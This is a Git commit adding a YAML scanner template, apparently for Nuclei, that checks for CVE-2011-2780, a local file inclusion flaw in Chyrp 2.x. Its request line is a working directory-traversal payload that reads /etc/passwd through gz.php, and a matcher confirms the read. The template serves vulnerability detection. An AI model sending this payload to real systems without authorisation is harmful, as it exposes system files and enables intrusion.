Create CVE-2011-2780.yaml

patch-1
Muhammad Daffa 2021-09-10 20:27:44 +07:00 committed by GitHub
parent cf4ef2ac5a
commit 38c66ed681
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2011-2780
info:
name: Chyrp 2.x - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/35946
- https://www.cvedetails.com/cve/CVE-2011-2780
tags: cve,cve2011,lfi
classification:
cvss-score: 5.0
cve-id: CVE-2011-2780
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200